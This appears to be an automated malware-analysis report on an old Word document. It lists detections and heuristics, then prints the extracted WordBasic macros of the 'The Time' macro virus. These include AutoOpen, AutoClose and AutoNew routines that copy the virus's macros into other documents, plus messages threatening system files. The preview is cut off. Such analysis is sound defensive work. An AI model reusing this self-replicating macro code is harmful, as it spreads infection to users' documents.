Verdict: MALICIOUS
Risk Score: 180

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment

The file contains legacy WordBasic macros, including AutoOpen and AutoClose, which are indicative of older malware techniques. The script itself, named 'TheTime', displays numerous message boxes to the user, including a message about deleting 'COMMAND.COM' and 'AUTOEXEC.BAT', suggesting a destructive or disruptive intent. While no direct payload execution or network communication is evident in the provided script, the presence of these macros and the suggestive messages warrant a high level of suspicion.

Heuristics 5
- ClamAV: Legacy.Trojan.Agent-658 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Legacy.Trojan.Agent-658
- VBA macros detected (medium, 2 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- Auto_Close macro (high, OLE_VBA_AUTOCLOSE): Auto_Close macro
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5856 bytes |

SHA-256: 9d3f02e215f20a54674b5895ec37cd2cf4aca8ec0f3e916f5fdfd87fa0a014e9

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "TheTime"
Public Sub MAIN()
If WordBasic.Hour(WordBasic.Now()) = 15 And WordBasic.Minute(WordBasic.Now()) = 59 Then
Else
GoTo Finish
End If
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.MsgBox "Hi I´m the Time virus"
WordBasic.Beep
WordBasic.MsgBox " I don´t like Your COMMAND.COM and AUTOEXEC.BAT"
WordBasic.Beep
WordBasic.MsgBox "Play with me !! :-) "
WordBasic.Beep
WordBasic.MsgBox " You have 1 Minute time to find me"
WordBasic.Beep
WordBasic.MsgBox " Find me, I do nothing"
WordBasic.Beep
WordBasic.MsgBox " Find me not "
WordBasic.Beep
WordBasic.MsgBox " SAY BYE TO YOUR COMMAND.COM AND AUTOEXEC.BAT"
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
WordBasic.Beep
Finish:
End Sub
Attribute VB_Name = "AutoNew"
Public Sub MAIN()
Dim i
Dim VInstalled
Dim Erro
On Error GoTo -1: On Error GoTo Finish
For i = 1 To WordBasic.CountMacros(1, 0)
If WordBasic.[MacroName$](i, 1, 1) = "TheTime" Then
VInstalled = 1
End If
Next i
If VInstalled = 1 Then
GoTo Finish
Else
On Erro Resume Next
WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[FileName$]() + ":AutoOpen", 1
WordBasic.MacroCopy "Global:TheTime", WordBasic.[FileName$]() + ":TheTime", 1
WordBasic.MacroCopy "Global:AutoExec", WordBasic.[FileName$]() + ":AutoExec", 1
WordBasic.MacroCopy "Global:AutoNew", WordBasic.[FileName$]() + ":AutoNew", 1
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoClose", 1
WordBasic.MacroCopy "Global:Kill", WordBasic.[FileName$]() + ":Kill", 1
WordBasic.FileSaveAll 1, 0
End If
Finish:
End Sub
Attribute VB_Name = "AutoClose"
Public Sub MAIN()
Dim i
Dim VInstalled
On Error GoTo -1: On Error GoTo Finish
For i = 1 To WordBasic.CountMacros(1, 0)
If WordBasic.[MacroName$](i, 1, 1) = "TheTime" Then
VInstalled = 1
End If
Next i
If VInstalled = 1 Then
GoTo Finish
Else
On Error Resume Next
WordBasic.FileSaveAs Format:=1
WordBasic.MacroCopy "Global:AutoOpen", WordBasic.[FileName$]() + ":AutoOpen", 1
WordBasic.MacroCopy "Global:TheTime", WordBasic.[FileName$]() + ":TheTime", 1
WordBasic.MacroCopy "Global:AutoExec", WordBasic.[FileName$]() + ":AutoExec", 1
WordBasic.MacroCopy "Global:AutoNew", WordBasic.[FileName$]() + ":AutoNew", 1
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoClose", 1
WordBasic.MacroCopy "Global:Kill", WordBasic.[FileName$]() + ":Kill", 1
WordBasic.FileSaveAll 1, 0
End If
Finish:
End Sub
Attribute VB_Name = "AutoExec"
Public Sub MAIN()
WordBasic.Call "AutoOpen"
End Sub
Attribute VB_Name = "AutoOpen"
Public Sub MAIN()
Dim i
Dim VInstalled
WordBasic.ToggleFull
WordBasic.InsertPara
WordBasic.Insert Chr(9) + Chr(9) + Chr(9) + Chr(9) + Chr(9)
WordBasic.Bold
WordBasic.FontSize 18
WordBasic.Insert "You are infected with"
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 72
WordBasic.Insert Chr(9) + Chr(9) + Chr(9) + Chr(9) + "The Time"
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.InsertPara
WordBasic.FontSize 25
Wor
... (truncated)